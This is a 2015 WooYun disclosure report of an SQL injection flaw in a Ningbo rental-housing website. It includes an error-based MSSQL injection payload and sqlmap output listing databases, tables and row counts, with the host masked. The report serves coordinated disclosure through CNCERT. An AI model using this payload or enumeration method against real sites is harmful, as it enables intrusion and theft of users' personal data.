当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148088

漏洞标题:宁波租房存在漏洞导致【身份 邮箱 手机号 明文密码 姓名 地址 房产公司】

相关厂商:宁波租房

漏洞作者: me1ody

提交时间:2015-10-22 09:26

修复时间:2015-12-10 16:54

公开时间:2015-12-10 16:54

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-22: 细节已通知厂商并且等待厂商处理中
2015-10-26: 厂商已经确认,细节仅向厂商公开
2015-11-05: 细节向核心白帽子及相关领域专家公开
2015-11-15: 细节向普通白帽子公开
2015-11-25: 细节向实习白帽子公开
2015-12-10: 细节向公众公开

简要描述:

涉及资料身份 邮箱 手机号 明文密码 姓名 地址 房产公司

详细说明:

注入点

http://**.**.**.**/ROlist.aspx?tab1=%ba%cf%d7%e2


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: tab1 (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: tab1=%ba%cf%d7%e2%') AND 8417=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (8417=8417) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113))) AND ('zZkf'='zZkf
---
web server operating system: Windows
web application technology: ASP.NET, Nginx, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [39]:
[*] bbsScan
[*] bbsScan2
[*] cnoolgallery
[*] CnoolKanNB
[*] CnoolPublicSentiment
[*] CnoolPublicSentimentJD
[*] CnoolPublicZX
[*] CnoolTag
[*] db_cnoolcollection
[*] db_forum
[*] db_forum_club
[*] db_forum_cms
[*] db_forum_hall
[*] db_forum_member
[*] db_forum_mypost
[*] db_forum_myrate
[*] db_forum_mytopic
[*] db_forum_police
[*] db_forum_post
[*] db_forum_post2
[*] db_forum_rate
[*] db_forum_ratesearch
[*] db_forum_search
[*] db_forum_topic
[*] db_forum_topictag
[*] db_www_click
[*] JdPublicSentiment
[*] master
[*] model
[*] msdb
[*] NewHouse2012
[*] newshot
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] UCenter
[*] UCenterBusiness
[*] UCenterLog
[*] userrecord
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: tab1 (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: tab1=%ba%cf%d7%e2%') AND 8417=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (8417=8417) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113))) AND ('zZkf'='zZkf
---
web server operating system: Windows
web application technology: ASP.NET, Nginx, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: NewHouse2012
[106 tables]
+---------------------------+
| TB_ActionLog |
| TB_Admin |
| TB_Apartment |
| TB_Area |
| TB_BrokerApply |
| TB_Building_Count |
| TB_CarPark |
| TB_CarParkClass |
| TB_CarParkOrder |
| TB_City |
| TB_Code |
| TB_Comment |
| TB_Company |
| TB_CompanyInfo |
| TB_Config |
| TB_DayInMoney |
| TB_DayInMoney_Apply |
| TB_DayMoneyRoster |
| TB_Discount |
| TB_DistrictsDynamic |
| TB_DistrictsInfo |
| TB_DistrictsPicture |
| TB_DistrictsPrice |
| TB_FYB_VoteInfo |
| TB_FYB_VoteRecord |
| TB_FYGFriend |
| TB_FYGGood |
| TB_FYGGoodOrder |
| TB_FYGHouse |
| TB_FYGHouseReward |
| TB_FYGLog |
| TB_FYGMoney |
| TB_FYGMoneyNew |
| TB_FYGMsg |
| TB_FYGOrder |
| TB_FYGRedPacket |
| TB_FYGUser |
| TB_FYGUserPost |
| TB_FYGUserToUser |
| TB_FYGWill |
| TB_FYGWillConfig |
| TB_Gold |
| TB_Gold_Temp |
| TB_Growth |
| TB_Growth_Temp |
| TB_Honest_Temp |
| TB_Identification |
| TB_Image |
| TB_KeyWord |
| TB_LH_Apply |
| TB_LH_Districts |
| TB_LH_Line |
| TB_Log |
| TB_NiceComment |
| TB_Order |
| TB_OrderPay |
| TB_Person |
| TB_Port |
| TB_Port_Temp |
| TB_Product |
| TB_QQ |
| TB_RO_EveryDayInfo |
| TB_RentIn |
| TB_RentIn_New |
| TB_RentOut |
| TB_Score |
| TB_Score_Temp |
| TB_THO_EveryDayInfo |
| TB_TowHandIn |
| TB_TowHandOut |
| TB_TwoHandIn_New |
| TB_TypeName |
| TB_User |
| TB_UserLog |
| TB_WX_Admin |
| TB_WX_Answer |
| TB_WX_AutoReply |
| TB_WX_AutoReplyNews |
| TB_WX_DistrictsImpress |
| TB_WX_DistrictsInfo |
| TB_WX_DistrictsNews |
| TB_WX_FullView |
| TB_WX_Game |
| TB_WX_GameAward |
| TB_WX_GameUser |
| TB_WX_Point |
| TB_WX_ProfessionalComment |
| TB_WX_Question |
| TB_WeiXinActivity |
| TB_WeiXinGameCard |
| TB_WeiXinPicPicList |
| TB_WeiXinPicUser |
| TB_WeiXinPicVote |
| TB_WeiXinProduct |
| TB_WeiXinProductList |
| TB_WeiXinRedPacket |
| TB_WeiXinUser |
| TB_WeixinPicPro |
| sqlmapoutput |
| temp_rentin_20151013 |
| weihouse_Configure |
| weihouse_House |
| weihouse_HouseConfigure |
| weihouse_SurfRecord |
| weihouse_Type |
| weihouse_User |
+---------------------------+
Database: NewHouse2012
+-------------------------------+---------+
| Table | Entries |
+-------------------------------+---------+
| dbo.TB_Score_Temp | 4210851 |
| dbo.TB_UserLog | 2329721 |
| dbo.TB_Image | 509467 |
| dbo.TB_FYGLog | 385932 |
| dbo.TB_TowHandOut | 235313 |
| dbo.TB_RentOut | 97013 |
| dbo.TB_THO_EveryDayInfo | 37713 |
| dbo.TB_Person | 37181 |
| dbo.TB_Score | 30991 |
| dbo.TB_LH_Apply | 30900 |
| dbo.TB_RO_EveryDayInfo | 29637 |
| dbo.TB_WeiXinUser | 21549 |
| dbo.TB_WeiXinProductList | 13991 |
| dbo.TB_Order | 11176 |
| dbo.TB_DistrictsPicture | 10947 |
| dbo.TB_DistrictsDynamic | 10262 |
| dbo.weihouse_HouseConfigure | 7462 |
| dbo.TB_TowHandIn | 5626 |
| dbo.TB_Company | 5362 |
| dbo.TB_RentIn | 5302 |
| dbo.TB_FYGMsg | 3503 |
| dbo.TB_User | 2742 |
| dbo.TB_Apartment | 2592 |
| dbo.TB_DistrictsPrice | 2463 |
| dbo.weihouse_House | 2463 |
| dbo.TB_Code | 2347 |
| dbo.TB_Log | 2071 |
| dbo.TB_WeiXinGameCard | 1999 |
| dbo.TB_DistrictsInfo | 1948 |
| dbo.weihouse_SurfRecord | 1580 |
| dbo.TB_Area | 1201 |
| dbo.TB_FYGOrder | 1011 |
| dbo.TB_FYGMoneyNew | 941 |
| dbo.TB_Identification | 784 |
| dbo.TB_FYB_VoteRecord | 748 |
| dbo.TB_FYGGoodOrder | 699 |
| dbo.TB_LH_Districts | 523 |
| dbo.TB_WX_GameUser | 502 |
| dbo.TB_FYB_VoteInfo | 336 |
| dbo.TB_FYGUser | 274 |
| dbo.TB_LH_Line | 183 |
| dbo.TB_WeiXinRedPacket | 157 |
| dbo.TB_Config | 148 |
| dbo.TB_FYGUserPost | 140 |
| dbo.TB_WX_DistrictsImpress | 97 |
| dbo.TB_WX_Point | 68 |
| dbo.TB_KeyWord | 67 |
| dbo.TB_QQ | 58 |
| dbo.TB_FYGWillConfig | 48 |
| dbo.TB_Port_Temp | 37 |
| dbo.TB_FYGWill | 34 |
| dbo.TB_FYGHouse | 26 |
| dbo.TB_OrderPay | 25 |
| dbo.TB_FYGFriend | 23 |
| dbo.TB_Growth_Temp | 23 |
| dbo.TB_Product | 20 |
| dbo.TB_Admin | 19 |
| dbo.TB_Discount | 17 |
| dbo.TB_City | 15 |
| dbo.TB_Gold_Temp | 15 |
| dbo.TB_WX_Question | 13 |
| dbo.TB_WX_AutoReplyNews | 12 |
| dbo.TB_WX_GameAward | 12 |
| dbo.weihouse_Configure | 12 |
| dbo.TB_CarPark | 9 |
| dbo.TB_CompanyInfo | 9 |
| dbo.TB_WX_AutoReply | 9 |
| dbo.temp_rentin_20151013 | 9 |
| dbo.weihouse_Type | 9 |
| dbo.TB_Growth | 7 |
| dbo.TB_WeiXinPicVote | 7 |
| dbo.TB_FYGGood | 6 |
| dbo.TB_TypeName | 6 |
| dbo.TB_WeiXinProduct | 6 |
| dbo.TB_CarParkClass | 5 |
| dbo.TB_Port | 5 |
| dbo.TB_RentIn_New | 5 |
| dbo.TB_WeiXinPicPicList | 5 |
| dbo.TB_WX_DistrictsInfo | 5 |
| dbo.TB_WX_Game | 5 |
| dbo.TB_FYGMoney | 4 |
| dbo.TB_WeiXinActivity | 4 |
| dbo.TB_WX_Admin | 4 |
| dbo.TB_BrokerApply | 3 |
| dbo.TB_WeiXinPicUser | 3 |
| dbo.TB_WX_DistrictsNews | 3 |
| dbo.TB_WX_FullView | 3 |
| dbo.weihouse_User | 3 |
| dbo.TB_Gold | 2 |
| dbo.TB_TwoHandIn_New | 2 |
| dbo.TB_WeixinPicPro | 2 |
| dbo.TB_DayMoneyRoster | 1 |
| dbo.TB_WX_Answer | 1 |
| dbo.TB_WX_ProfessionalComment | 1 |
+-------------------------------+---------+


QQ截图20151020164706.png


QQ截图20151020164616.png

漏洞证明:

如上

修复方案:

- -

版权声明:转载请注明来源 me1ody@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-26 16:52

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评价